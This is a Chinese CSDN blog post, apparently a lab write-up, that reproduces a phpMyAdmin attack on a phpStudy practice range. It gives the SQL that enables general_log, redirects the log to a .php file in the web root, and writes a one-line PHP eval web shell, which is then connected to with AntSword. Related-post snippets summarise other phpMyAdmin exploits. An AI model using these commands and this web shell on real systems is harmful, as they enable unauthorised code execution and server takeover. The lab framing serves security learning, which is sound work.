phpmyadmin漏洞复现

于 2024-09-12 19:20:20 发布
阅读量126 收藏
点赞数 5
文章标签: android 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66022252/article/details/142183792
版权

从小皮登入靶场后输入账号密码进入靶场

点击sql框进行注入

查询日志

set global general_log="on"

SET GLOBAL general_log="ON"; 是一条SQL语句,用于在MySQL数据库中启用全局查询日志(General Query Log)。这个日志记录了MySQL服务器接收到的每一个客户端请求,包括连接和断开连接的请求、SQL语句的执行等。这对于监控数据库活动、审计或调试是非常有用的。

改变日志存储位置(mm.php为事先做好的一句话木马)

​​​​​​​set global generallogfile = "D://phpstudy_pro/WWW/mm.php";

查询一句话木马

​​​​​​​select "<?php eval($_POST['pass'])?>";

查看日志,发现一句话木马

访问php文件,并使用蚁剑进行连接

连接成功~~~~~~~~

开荤小肥羊
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpMyAdmin 漏洞复现教程
2201_75891821的博客
08-03 488
然后我们更改日志保存路径然后查看是否更改成功 显示 更改成功然后我们插入一句话木马访问一下木马然后使用工具连接。
PhPMyadmin漏洞复现
cheapkiller的博客
08-03 375
首先我们打开环境,这个环境需要在小皮面板里安装,然后php版本需要在5.5+以上的版本才可以运行。点击变量按钮搜索gen会看到创建的文件夹的目录。然后打开网页根目录发现有生成的我们的木马。然后打开sql面板,将面板中的语句执行。然后在工具上进行连接测试。写入一个webshell。下一步写入文件导入即可。保证日志保存状态开启。
PhPMyadmin-漏洞复现
Jz031212的博客
08-03 210
2.因为extensions同级目录下有www文件存放网站,所以我们猜测网站路径在D:\phpstudy_pro\WWW,使用into outfile将一句话木马写入别的目录下。4.在输入 set global general_log_file = '你要将日志保存的路径' 将日志文件路径设置好,点击执行。5.我们在sql框内输入select 123123 后执行,在刚刚的路径内找到我们的日志文件,可以找到我们刚才输入的指令。4.使用中国蚁剑将网址和木马内的密码输入,测试连接,成功即代表注入成功。
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1404
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
phpmyadmin4.8.1漏洞复现-远程文件包含
weixin_54555816的博客
04-10 4467
phpMyAdmin4.8.0 - 4.8.1版本均受漏洞影响。 环境搭建:phpstudy+windows+phpmyadmin4.8.1 注意要将phpmyadmin解压下载到phpstudy网站根目录 像我这里的根目录就是在www目录这里 解压之后再打开localhost/phpMyAdmin 或者127.0.0.1/phpMyAdmin 默认的初始账号和密码都是root,但是由于我之前修改了mysql的密码,所以这个密码就和MySQL的密码一样 然后来到这个phpmyadm.
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1477
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadmin漏洞复现——本地文件包含与远程包含
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 527
本地文件包含与远程包含 原理:攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 包含文件很有用,可以简化代码;文件包含分为本地和远程文件包含(需要allow_url_include = On);本地文件包含LFI 远程文件包含 RFI 首先我们来了解4个函数(php) **1.include:**使用include引用外部文
phpmyadmin-CVE-2016-5734漏洞复现
chenyy95的博客
05-29 310
CVE漏洞复现
phpMyAdmin历史漏洞复现
lonmar的博客
07-24 1315
简介 phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具。它能够创建和删除数据库,创建/删除/修改表格,删除/编辑/新增字段,执行SQL脚本等 复现三个古老漏洞 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 643
漏洞
PhpMyAdmin远程执行代码漏洞复现 (CVE-2016-5734)
千寻的博客
03-21 1483
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 685
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
高德地图SDK Android版开发 10 InfoWindow
程序喵D的博客
09-06 2011
前文介绍高德地图添加Marker覆盖物的使用方法,Marker结合InfoWindow可展示更详尽的信息。本文将介绍以下内容:1. 使用SDK默认样式显示InfoWindow的方法;2. 自定义InfoWindow样式的方法。
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 654
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
Android13默认开启电池百分比数字显示Framework
技术的积累,其实就是财富的积累呀。
09-05 397
通过,0,1 的切换,可以修改默认显示电池数字百分比,或不显示电池数字百分比的效果。修改2个地方,一个是Setting,一个是SystemUI显示。通过查阅Framework代码。终于找到了如何默认显示。查了很多平台,就是没有Android13的。有个小需求,需要实现。
Android】ViewPager基本用法总结
Patrick_yuxuan的博客
09-06 1211
ViewPager是 Android 中一个用于在同一屏幕上滑动不同页面(通常是左右滑动)的组件。它通常用于实现多页面滑动效果,比如应用的引导页、图片轮播、以及支持标签导航的界面。ViewPager与结合使用。是一个适配器,它负责为ViewPager提供页面内容。每个页面通常是一个Fragment,也可以是一个普通的View。
Android 生成so库 并调用
最新发布
xige1995的博客
09-11 258
上面的内容生成so库及给java代码调用就完成了。MainActivity.class中进行引用。native-lib.cpp增加方法。
phpmyadmin漏洞
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都生效,因此有使用该系统的需要引起格外的重视,及时修补该漏洞。\[1\]引用\[2\]:文件包含漏洞是指在程序中动态引用了用户可控制的文件,而没有对用户输入进行充分的过滤和验证,导致攻击者可以通过构造恶意的文件路径来读取、执行或者包含任意文件。\[2\]引用\[3\]:在phpMyadmin的大部分版本中都存在文件包含漏洞。\[3\] 问题: phpmyadmin漏洞是什么? 回答: phpMyadmin漏洞是指在phpMyadmin程序中存在的文件包含漏洞。该漏洞允许攻击者通过构造恶意的文件路径来读取、执行或者包含任意文件。这个漏洞对于大部分版本的phpMyadmin都生效,因此使用该系统的用户需要格外重视,并及时修补该漏洞。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [phpmyadminV4.8.1本地文件包含漏洞复现](https://blog.csdn.net/weixin_64551911/article/details/125609281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值